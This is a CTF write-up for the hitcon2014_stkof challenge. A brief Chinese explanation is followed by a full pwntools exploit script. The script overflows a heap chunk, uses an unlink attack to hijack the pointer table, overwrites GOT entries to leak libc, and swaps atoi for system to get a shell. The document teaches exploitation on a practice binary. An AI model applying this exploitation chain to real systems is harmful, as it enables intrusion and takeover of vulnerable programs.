hitcon2014_stkof
查看保护
edit 功能允许用户自己指定 size，程序没有把它和该 chunk 申请时的大小做比较，而是直接按这个长度读入数据，因此存在堆溢出（下面的脚本对一个 0x30 大小的 chunk 写入了 0x40 字节）。
利用 unlink：在 chunk 2 的数据区伪造一个 chunk，溢出改写 chunk 3 的 prev_size/size 并清掉 PREV_INUSE，free(chunk 3) 时向前合并触发 unlink，使全局 chunk 指针表中 s[2] 指向指针表自身。之后 edit(2) 就能把指针表改成 free/puts/atoi 的 got 地址：先把 free@got 改成 puts@plt，再 free 一个"指向 puts@got"的 chunk 即可泄露 libc；最后把 atoi@got 改成 system（或 gadget），输入 /bin/sh 即可 getshell。unlink 的具体原理见 z1r0’s blog。
from pwn import *
# Target selection.  NOTE: the naming is inverted — `debug = 1` talks to the
# remote BUUOJ instance, anything else spawns the binary locally.
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
# Pick the tube once; everything below only ever uses `r`.
r = remote('node4.buuoj.cn', 29169) if debug else process(file_name)
# Symbol tables for the challenge binary and for the libc this exploit assumes
# the target runs (2.23).  A different remote libc makes every offset derived
# from `libc` below wrong.
elf = ELF(file_name)
libc = ELF('./2.23/libc-2.23.so')
def create(size):
    """Menu option 1 (create): ask the program for a chunk of ``size`` bytes."""
    for field in ('1', str(size)):
        r.sendline(field)
def edit(index, size, content):
    """Menu option 2 (edit): write ``content`` into the chunk at ``index``.

    ``size`` is the byte count the program reads, so callers pass
    ``len(content)``.  The write-up above notes that ``size`` is never checked
    against the chunk's allocation, which is the overflow this script uses.
    """
    header = ('2', str(index), str(size))
    for field in header:
        r.sendline(field)
    # Raw send, not sendline: the program consumes exactly `size` bytes.
    r.send(content)
def delete(index):
    """Menu option 3 (delete): free the chunk stored at ``index``."""
    for field in ('3', str(index)):
        r.sendline(field)
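def dbg(gdbscript=''):
    """Attach gdb to the target.

    Only meaningful when ``r`` is a local ``process`` tube; with the remote
    tube there is no local process to attach to.  ``gdbscript`` is passed
    through to ``gdb.attach`` so breakpoints can be set before continuing.
    """
    gdb.attach(r, gdbscript=gdbscript)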
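# ---- Stage 0: heap layout ----------------------------------------------------
# Three chunks.  The unlink is done between chunks 2 and 3; chunk 1 only serves
# to put the two working chunks next to each other.
create(0x100)   # chunk 1 (padding)
create(0x30)    # chunk 2: 0x40-byte chunk, will hold the fake chunk
create(0x80)    # chunk 3: 0x90-byte chunk, freed to trigger the consolidation

# ---- Stage 1: unlink -----------------------------------------------------------
# The program keeps its chunk pointers in a global table; this script hard-codes
# that table at 0x602140 with 8 bytes per entry, so &s[2] == 0x602150.
# glibc's unlink requires FD->bk == P and BK->fd == P for the fake chunk P
# (P == s[2]), which holds when fd = &s[2] - 0x18 and bk = &s[2] - 0x10.
ptr_table = 0x602140
chunk2_slot = ptr_table + 2 * 8
fd = p64(chunk2_slot - 0x18)   # == 0x602140 - 0x8
bk = p64(chunk2_slot - 0x10)   # == 0x602140
# Fake chunk at the start of chunk 2's user data: prev_size, size, fd, bk.
fake_chunk = p64(0) + p64(0x20) + fd + bk + p64(0x20)
fake_chunk = fake_chunk.ljust(0x30, b'a')
# Overflow into chunk 3's header: prev_size = 0x30 makes our fake chunk the
# "previous chunk"; size 0x90 keeps chunk 3's real size but clears PREV_INUSE
# so free() consolidates backwards.  0x90 is above the fastbin range, which is
# presumably why chunk 3 was created with 0x80.
p1 = fake_chunk + p64(0x30) + p64(0x90)
edit(2, len(p1), p1)   # 0x40 bytes into a 0x30-byte allocation: the overflow
delete(3)              # free(chunk 3) -> unlink(fake chunk) -> s[2] = FD == table - 8

# ---- Stage 2: rewrite the pointer table with GOT addresses -------------------
free_got = elf.got['free']
puts_got = elf.got['puts']
atoi_got = elf.got['atoi']
puts_plt = elf.plt['puts']
# s[2] now points 8 bytes before s[0], so this single edit lays out:
#   (pad), s[0] = free@got, s[1] = puts@got, s[2] = atoi@got
p2 = p64(0) + p64(free_got) + p64(puts_got) + p64(atoi_got)
edit(2, len(p2), p2)
# edit(0) writes through s[0] == free@got: from now on free() jumps to puts@plt.
p3 = p64(puts_plt)
edit(0, len(p3), p3)
# delete(1) -> free(s[1]) -> puts(puts@got): prints the resolved puts address.
delete(1)

# ---- Stage 3: libc leak ----------------------------------------------------------
# puts stops at the first NUL; a userland libc address is 6 bytes ending in
# 0x7f, so the last 6 bytes before the first 0x7f are the address.  (A 0x7f
# inside a lower byte of the address would truncate the leak — unlikely but
# worth knowing if this stage misbehaves.)
leak = r.recvuntil(b'\x7f')[-6:]
puts_addr = u64(leak.ljust(8, b'\x00'))
success(f'puts_addr = {puts_addr:#x}')
libc_base = puts_addr - libc.sym['puts']
# Sanity check: libc is mapped page-aligned, so the leaked puts must share its
# low 12 bits with the offline libc's puts offset.  If not, the remote libc is
# not the assumed 2.23 (or the leak grabbed the wrong bytes) and the system
# address computed below would be garbage — stop here instead of crashing.
if libc_base & 0xfff:
    log.error(f'puts leak {puts_addr:#x} does not match ./2.23/libc-2.23.so '
              f'(derived base {libc_base:#x} is not page-aligned)')
success(f'libc_base = {libc_base:#x}')
system_addr = libc_base + libc.sym['system']

# ---- Stage 4: atoi -> system -------------------------------------------------------
# s[2] == atoi@got, so this edit replaces atoi with system; the program
# presumably parses the next menu input with atoi, which then becomes
# system("/bin/sh").
p4 = p64(system_addr)
edit(2, len(p4), p4)
r.sendline(b'/bin/sh\x00')
r.interactive()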